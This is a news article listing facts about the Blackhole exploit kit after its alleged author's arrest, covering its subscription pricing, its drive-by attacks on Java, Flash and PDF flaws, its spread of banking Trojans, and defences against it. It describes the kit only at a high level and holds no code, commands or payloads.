Blackhole Author Arrested: 10 Facts About The Automated Attack Toolkit

Blackhole Exploit Kit Author Arrested

The alleged cybercriminal responsible for developing and maintaining the Blackhole automated attack toolkit was arrested this week, according to the European Cybercrime Centre (EC3). The agency confirmed that authorities had a person in custody Tuesday to TechWeek Europe. The most widely used toolkit was behind many of the financially motivated attacks aimed at businesses and people. The toolkit was sold on underground hacking forums under a subscription-based business model, which included periodic updates. The updates included some of the latest exploits, such as those targeting known Java vulnerabilities, Adobe coding errors and Microsoft flaws. The toolkit is often among the first to receive updates with new exploits following major patch releases from software makers. Here are some facts about the most popular automated attack tool on the Internet.

Russian Cybercriminal Behind Attack Toolkit

Security researchers believe that a Russian software developer, who goes by the name "Paunch," is behind the Blackhole toolkit, which was first detected in 2011. There has been no official word from authorities about his arrest. The automated toolkit sold through a monthly subscription rate for about $500 a month and could also be purchased at $50 a day. It was released as a free download in 2011. A review of the popular toolkit found it was still the most active, but other toolkits have entered the market. Some security vendors say the kit has been in decline. Security firm AVG currently ranks Blackhole 24th in the world among online malware, affecting more than 36,000 websites in 218 countries.

Blackhole Targets Website Vulnerabilities

Toolkit owners set up an attack platform by targeting vulnerable websites. SQL injection and cross-site scripting errors are the most common Web application vulnerabilities. The Blackhole toolkit uses malicious JavaScript to load an iFrame within the HTML on a page and silently scan's visitors' systems for flaws that can be easily exploited. A flaw that is detected automatically triggers the exploit, dropping a malware loader onto the victim's machine.

Blackhole Attacks Driven By Malicious Links

Victims of the Blackhole attack toolkit are generally redirected through spam messages containing a malicious link or poisoned advertisements. Visiting compromised websites, often legitimate sites, can also lead to a malware infection as a result of the automated toolkit. The goal of the kit is to be widespread, infecting as many victims as possible.

Blackhole Behind Spread Of Zeus, SpyEye Banking Trojans

Blackhole is partially responsible for the spread of Zeus and SpyEye, two closely related banking Trojan families responsible for stealing millions of bank account holders' information. The toolkit was used to build attack websites. Victims receive spam email and are redirected to the attack website where Blackhole targets Adobe Reader, Flash and Java browser-plugin vulnerabilities. Blackhole doesn't drop Zeus payload directly, but uses a tiny loader that retrieves Zeus from an additional website, according to research by Dell SecureWorks.

Blackhole Uses Java, Flash, .PDF Exploits

One recent study estimated that unpatched Java installations were responsible for 60 percent of successful Blackhole exploits. Researchers detected the toolkit targeting a Java zero-day vulnerability in January, but automated attack toolkits typically target older flaws. Blackhole is constantly changing, but security researchers say it is responsible for targeting at least three or more Java vulnerabilities.

The kit has been seen exploiting five or more Adobe .PDF exploits and serves up exploit Adobe Flash files. Thirty percent of the malware samples analyzed by managed security services provider Solutionary were traced back to Blackhole. Solutionary said exploit kits like Blackhole are successful because users constantly fail to patch their systems and browser components.

Blackhole Success Largely Due To Traffic Generation

Traffic redirected to the exploit kit is fundamental to its success, according to Blackhole research conducted by Sophos researcher Fraser Howard. The kit is also constantly changing, with strong evasion capabilities helping it slip past URL filters, IDS and other security systems without being detected. Blackhole, according to Howard, has also been competitively priced and viewed favorably in hacking forums for its support and active updates. Howard predicted that the centralized approach used to maintain control over Blackhole could also prove to be its Achilles' heel, enabling law enforcement to shut it down or severely cripple it.

Blackhole Hosted Mostly In US, Russia

The United States and Russia are home to the most compromised websites hosting Blackhole, according to data from U.K.-based security vendor Sophos. The security firm said attackers often register a .com domain and can turn it into an attack site within 24 hours. "Blackhole host sites move rapidly," the firm said. In addition attackers compromise the Web servers behind legitimate sites, setting them up with malicious code that generates a stealthy attack when victims visit an infected Web page.

Defending The Network From Blackhole: Exploit Kit Prevention

Security experts advocate a variety of technologies that provide protection from automated attack toolkits. Intrusion prevention systems detect and block ongoing attacks. Proactive network monitoring and threat intelligence feeds can be fed into systems to apply protections against the latest threats and block potentially malicious IP addresses associated with them. End users should be using up-to-date endpoint security software. Web content filtering can be applied to detect botnet activity by detecting malicious traffic.

Defending A Website From Blackhole: Regular Scanning Works

Websites should be scanned regularly for Web application vulnerabilities and other weaknesses that can be detected and exploited by an automated attack toolkit. A Web application firewall can protect Web applications from attack, and it can be used to apply virtual patches to help shield a vulnerability from an exploit without applying the official patch.

Blackhole Author Created Premium 'Cool' Exploit Kit

The author of Blackhole is said to also be behind the creation of the Cool Exploit Kit, a premium attack toolkit that was purportedly once rented at $10,000 a month. When it was released in January, the kit was advertised as having highly sought-after exploits that target zero-day vulnerabilities. A review of the Cool toolkit conducted by Microsoft in May found the kit contained six exploits, including one Java zero-day flaw at the time. It's also believed to have fueled an increase in ransomware malware.